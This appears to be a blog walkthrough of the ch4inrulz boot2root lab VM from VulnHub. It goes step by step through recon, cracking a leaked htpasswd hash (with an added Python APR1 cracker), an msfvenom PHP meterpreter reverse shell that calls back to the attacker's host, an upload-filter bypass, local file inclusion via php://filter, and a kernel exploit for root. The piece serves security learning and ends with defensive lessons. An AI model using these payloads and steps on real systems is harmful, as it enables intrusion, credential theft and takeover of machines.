Tovi Jaeschke

ch4inrulz 1.0.1 boot2root walkthrough

Walkthrough for ch4inrulz from vulnhub.com.

Scanning & Recon

I start with a netdiscover ARP sweep of the local subnet to find the IP address of the target.


netdiscover -r 10.1.1.1/24
Currently scanning: Finished!   |   Screen View: Unique Hosts

10 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 564
_____________________________________________________________________________
IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.246      08:00:27:60:ca:e7      2      84  PCS Systemtechnik GmbH

The target is at 10.1.1.246, so I run a full-port nmap scan with version detection against it.

nmap -p- -sV -oN nmap_ch4inrulz.txt 10.1.1.246
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-22 11:43 ACDT
Nmap scan report for 10.1.1.246
Host is up (0.00028s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.5
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 08:00:27:60:CA:E7 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.97 seconds

I do a quick searchsploit search for each of the open services, but find nothing usable. I then open up the website and have a quick read of the content and the source code; again, I don't find anything. Next I run nikto against the main website, and dirb against both the main website and the second Apache instance on port 8011.

dirb http://10.1.1.246 -o ch4inrulz_dirb.txt
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: ch4inrulz_dirb.txt
START_TIME: Mon Oct 22 11:55:00 2018
URL_BASE: http://10.1.1.246/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.1.1.246/ ----
+ http://10.1.1.246/cgi-bin/ (CODE:403|SIZE:286)
==> DIRECTORY: http://10.1.1.246/css/
+ http://10.1.1.246/development (CODE:401|SIZE:477)
==> DIRECTORY: http://10.1.1.246/img/
+ http://10.1.1.246/index (CODE:200|SIZE:334)
+ http://10.1.1.246/index.html (CODE:200|SIZE:13516)
==> DIRECTORY: http://10.1.1.246/js/
+ http://10.1.1.246/LICENSE (CODE:200|SIZE:1093)
+ http://10.1.1.246/robots (CODE:200|SIZE:21)
+ http://10.1.1.246/robots.txt (CODE:200|SIZE:21)
+ http://10.1.1.246/server-status (CODE:403|SIZE:291)
==> DIRECTORY: http://10.1.1.246/vendor/

---- Entering directory: http://10.1.1.246/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.1.1.246/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.1.1.246/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.1.1.246/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Oct 22 11:55:02 2018
DOWNLOADED: 4612 - FOUND: 8

nikto -h http://10.1.1.246
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.246
+ Target Hostname:    10.1.1.246
+ Target Port:        80
+ Start Time:         2018-10-22 11:57:50 (GMT10.5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 1051931, size: 13516, mtime: Sat Apr 14 23:09:32 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.html.bak
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8479 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2018-10-22 11:58:05 (GMT10.5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


dirb http://10.1.1.246:8011

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Oct 22 12:48:49 2018
URL_BASE: http://10.1.1.246:8011/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.1.1.246:8011/ ----
==> DIRECTORY: http://10.1.1.246:8011/api/
+ http://10.1.1.246:8011/index.html (CODE:200|SIZE:30)
+ http://10.1.1.246:8011/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.1.1.246:8011/api/ ----
+ http://10.1.1.246:8011/api/index.html (CODE:200|SIZE:351)

-----------------
END_TIME: Mon Oct 22 12:48:52 2018
DOWNLOADED: 9224 - FOUND: 3

Two things stand out: the Apache mod_negotiation line in the nikto output, which reveals an alternate index.html.bak next to index.html, and the /api/ directory on port 8011 answering 200. I request http://10.1.1.246/index.html.bak, which the browser offers as a download:

<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>

The $apr1$ prefix identifies this as an Apache APR1 MD5-crypt hash, the format htpasswd -m writes; hash-identifier agrees (MD5(APR)), and john loads it as md5crypt. I save the line as-is, in single quotes so the shell does not expand the $ fields, and let john's default modes (single-crack first, which mangles the username) have a go.

echo 'frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0' > hashes.txt
john hashes.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-opencl"
Use the "--format=md5crypt-opencl" option to force loading these as that type instead
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 12x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
frank!!!         (frank)
1g 0:00:00:00 DONE 1/3 (2018-10-22 12:23) 33.33g/s 6300p/s 6300c/s 6300C/s Frank[..Fr4nk
Use the "--show" option to display all of the cracked passwords reliably
Session completed

John's single-crack mode derives the password from the username: frank!!!. I open /development/ in the browser, authenticate as frank, and have a look around.
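For anyone who wants to understand what john is actually computing here, the following is an added example (not code from the original walkthrough) that implements the APR1 variant of md5-crypt with nothing but hashlib and verifies the leaked hash against a candidate password or a small wordlist. The mini wordlist at the bottom is constructed for the example; the hash is the one from index.html.bak.

```python
"""Verify an Apache htpasswd $apr1$ hash offline (APR1 md5-crypt).

Added example, not part of the original walkthrough.  Implements the
algorithm behind `htpasswd -m` with hashlib only, so the leaked hash can be
checked against candidate passwords without john.
"""
import hashlib

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"

# The hash leaked in the HTML comment of index.html.bak on the box.
FRANK_HASH = "$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0"


def _to64(value: int, count: int) -> bytes:
    """md5-crypt's own 6-bit packing (not standard base64)."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def apr1_crypt(password: bytes, salt: bytes) -> str:
    """Return "$apr1$<salt>$<hash>" for a password and an up-to-8-byte salt."""
    salt = salt[:8]
    ctx = hashlib.md5(password + MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # Mix in the alternate digest, 16 bytes per 16 bytes of password length.
    for i in range(len(password), 0, -16):
        ctx.update(alt[:min(16, i)])
    # One byte per bit of the password length: NUL or the first password byte.
    i = len(password)
    while i:
        ctx.update(b"\x00" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 stretching rounds with the mixing pattern fixed by the algorithm.
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()
    # Digest bytes are emitted in a fixed, interleaved order.
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = b"".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order
    ) + _to64(final[11], 2)
    return (MAGIC + salt + b"$" + encoded).decode()


def apr1_verify(password: str, hashed: str) -> bool:
    """Check a candidate password against an htpasswd-style $apr1$ hash."""
    parts = hashed.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an APR1 hash")
    return apr1_crypt(password.encode(), parts[2].encode()) == hashed


def crack(hashed: str, candidates):
    """Tiny dictionary attack: the first candidate that verifies, or None."""
    for pw in candidates:
        if apr1_verify(pw, hashed):
            return pw
    return None


if __name__ == "__main__":
    # Constructed wordlist in the spirit of john's single-crack mode, which
    # builds guesses from the username on the hash line.
    words = ["frank", "Frank", "frank1", "frank!", "frank!!", "frank!!!"]
    print(crack(FRANK_HASH, words))
```

APR1 is a thousand rounds of MD5 with an eight-character salt, which is why john gets thousands of candidates per second per core against it; that is fine for a static-site password file, but it is no reason to pick a password that a mangling rule derives from the username.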

Getting a shell

I generate a PHP meterpreter reverse TCP payload and try to upload it through the file uploader under /development/.


msfvenom -p php/meterpreter/reverse_tcp LHOST="10.1.1.212" LPORT="4444" >> shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1111 bytes

But the upload is rejected with:

File is not an image.Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.

So I rename the file to shell.gif, insert the line GIF98 at the start of it, and try again, which works. (The real GIF magic is GIF87a or GIF89a, but PHP's getimagesize() only compares the first three bytes, "GIF", before reading the dimensions, so the malformed version string is enough.) Now I have no idea where the file was written to, so I go back to the earlier dirb scan of the port-8011 site and start poking at the /api/ path, beginning with files_api.php. Passing a file parameter in the query string returns an error that stumps me for a little while, so I try a POST request instead.

curl -X POST -d "file=/var/www/development/uploader/upload.php" http://10.1.1.246:8011/api/files_api.php

<head>
  <title>franks website | simple website browser API</title>
</head>

Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.

That looks like a failure, but the response is actually the output of upload.php being executed: with no form submitted, its extension check fails on the empty filename and it echoes exactly those two messages. In other words the file parameter goes to include() rather than readfile(), a classic local file inclusion. To read the source instead of running it, I wrap the path in a php://filter stream that base64-encodes the file before PHP gets a chance to interpret it.

curl -X POST -d "file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php" http://10.1.1.246:8011/api/files_api.php

<head>
  <title>franks website | simple website browser API</title>
</head>

PD9waHAKJHRhcmdldF9kaXIgPSAiRlJBTkt1cGxvYWRzLyI7CiR0YXJnZXRfZmlsZSA9ICR0YXJnZXRfZGlyIC4gYmFzZW5hbWUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSk7CiR1cGxvYWRPayA9IDE7CiRpbWFnZUZpbGVUeXBlID0gc3RydG9sb3dlcihwYXRoaW5mbygkdGFyZ2V0X2ZpbGUsUEFUSElORk9fRVhURU5TSU9OKSk7Ci8vIENoZWNrIGlmIGltYWdlIGZpbGUgaXMgYSBhY3R1YWwgaW1hZ2Ugb3IgZmFrZSBpbWFnZQppZihpc3NldCgkX1BPU1RbInN1Ym1pdCJdKSkgewogICAgJGNoZWNrID0gZ2V0aW1hZ2VzaXplKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJ0bXBfbmFtZSJdKTsKICAgIGlmKCRjaGVjayAhPT0gZmFsc2UpIHsKICAgICAgICBlY2hvICJGaWxlIGlzIGFuIGltYWdlIC0gIiAuICRjaGVja1sibWltZSJdIC4gIi4iOwogICAgICAgICR1cGxvYWRPayA9IDE7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkZpbGUgaXMgbm90IGFuIGltYWdlLiI7CiAgICAgICAgJHVwbG9hZE9rID0gMDsKICAgIH0KfQovLyBDaGVjayBpZiBmaWxlIGFscmVhZHkgZXhpc3RzCmlmIChmaWxlX2V4aXN0cygkdGFyZ2V0X2ZpbGUpKSB7CiAgICBlY2hvICJTb3JyeSwgZmlsZSBhbHJlYWR5IGV4aXN0cy4iOwogICAgJHVwbG9hZE9rID0gMDsKfQovLyBDaGVjayBmaWxlIHNpemUKaWYgKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJzaXplIl0gPiA1MDAwMDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgaXMgdG9vIGxhcmdlLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIEFsbG93IGNlcnRhaW4gZmlsZSBmb3JtYXRzCmlmKCRpbWFnZUZpbGVUeXBlICE9ICJqcGciICYmICRpbWFnZUZpbGVUeXBlICE9ICJwbmciICYmICRpbWFnZUZpbGVUeXBlICE9ICJqcGVnIgomJiAkaW1hZ2VGaWxlVHlwZSAhPSAiZ2lmIiApIHsKICAgIGVjaG8gIlNvcnJ5LCBvbmx5IEpQRywgSlBFRywgUE5HICYgR0lGIGZpbGVzIGFyZSBhbGxvd2VkLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIENoZWNrIGlmICR1cGxvYWRPayBpcyBzZXQgdG8gMCBieSBhbiBlcnJvcgppZiAoJHVwbG9hZE9rID09IDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgd2FzIG5vdCB1cGxvYWRlZC4iOwovLyBpZiBldmVyeXRoaW5nIGlzIG9rLCB0cnkgdG8gdXBsb2FkIGZpbGUKfSBlbHNlIHsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bInRtcF9uYW1lIl0sICR0YXJnZXRfZmlsZSkpIHsKICAgICAgICBlY2hvICJUaGUgZmlsZSAiLiBiYXNlbmFtZSggJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSkuICIgaGFzIGJlZW4gdXBsb2FkZWQgdG8gbXkgdXBsb2FkcyBwYXRoLiI7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIlNvcnJ5LCB0aGVyZSB3YXMgYW4gZXJyb3IgdXBsb2FkaW5nIHlvdXIgZmlsZS4iOwogICAgfQp9Cj8+Cgo=

Decoding the base64 gives the full source of upload.php:

<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}
// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>

The source shows uploads land in FRANKuploads/ next to upload.php, so my payload is at /var/www/development/uploader/FRANKuploads/shell.gif. I start a multi/handler in msfconsole and POST that path to files_api.php the same way; because the API include()s the file, the PHP inside the .gif runs and a meterpreter session comes back.

[*] Started reverse TCP handler on 10.1.1.212:4444
[*] Sending stage (37775 bytes) to 10.1.1.246
[*] Meterpreter session 1 opened (10.1.1.212:4444 -> 10.1.1.246:54405) at 2018-10-22 13:28:33 +1030

meterpreter > ls
Listing: /var/anotherwww/api
============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  656   fil   2018-04-14 21:36:15 +0930  files_api.php
100644/rw-r--r--  351   fil   2018-04-14 21:35:46 +0930  index.html

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > shell
Process 992 created.
Channel 0 created.
whoami
www-data
cd /home
ls
frank
cd frank
ls
PE.txt
user.txt
cat user.txt
4795aa2a9be22fac10e1c25794e75c1b
exit
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64
Meterpreter : php/linux
meterpreter >

Getting Root

The kernel is 2.6.35-19 from August 2010, so I use searchsploit to look for a local privilege escalation against it and find Dan Rosenberg's RDS socket exploit (CVE-2010-3904, EDB-ID 15285), which covers 2.6.30 up to 2.6.36-rc8. Kernel exploits can panic the target, so this is a last resort on anything that is not a throwaway VM. The banner repeats in the output below because the exploit forks a child for each kernel write while its stdout is a buffered pipe rather than a tty, so each child flushes the inherited buffer; it is one run, not three.


searchsploit linux 2.6 Privilege Escalation
...
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation                                                  | exploits/linux/local/15285.c
...


meterpreter > upload /opt/exploit-database/exploits/linux/local/15285.c /tmp/exploit.c
[*] uploading  : /opt/exploit-database/exploits/linux/local/15285.c -> /tmp/exploit.c
[*] Uploaded -1.00 B of 6.99 KiB (-0.01%): /opt/exploit-database/exploits/linux/local/15285.c -> /tmp/exploit.c
[*] uploaded   : /opt/exploit-database/exploits/linux/local/15285.c -> /tmp/exploit.c
meterpreter > shell
Process 1015 created.
Channel 1 created.
gcc exploit.c
ls
a.out
exploit.c
./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xffffffff81ce8df0
 [+] Resolved default_security_ops to 0xffffffff81a523e0
 [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
 [+] Resolved commit_creds to 0xffffffff810852b0
 [+] Resolved prepare_kernel_cred to 0xffffffff81085780
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xffffffff81ce8df0
 [+] Resolved default_security_ops to 0xffffffff81a523e0
 [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
 [+] Resolved commit_creds to 0xffffffff810852b0
 [+] Resolved prepare_kernel_cred to 0xffffffff81085780
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xffffffff81ce8df0
 [+] Resolved default_security_ops to 0xffffffff81a523e0
 [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
 [+] Resolved commit_creds to 0xffffffff810852b0
 [+] Resolved prepare_kernel_cred to 0xffffffff81085780
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
ls
a.out
exploit.c
whoami
root
ls /root
root.txt
cat /root/root.txt
8f420533b79076cc99e9f95a1a4e5568

Conclusion

This was a fun box, not too difficult. The chain was: MultiViews exposing index.html.bak, which leaked frank's htpasswd hash in an HTML comment; a password (frank!!!) that john derives from the username in under a second; an upload filter that only checked the extension and the first three bytes of the file; a files_api.php that include()s a user-supplied path; and a 2010 kernel with a public local root exploit. Every link is avoidable on its own: don't leave backups in the web root, don't put credentials in comments, pick passwords a mangling rule can't guess, store uploads under server-chosen names outside any included path, never include() user input, and keep your kernels up to date!!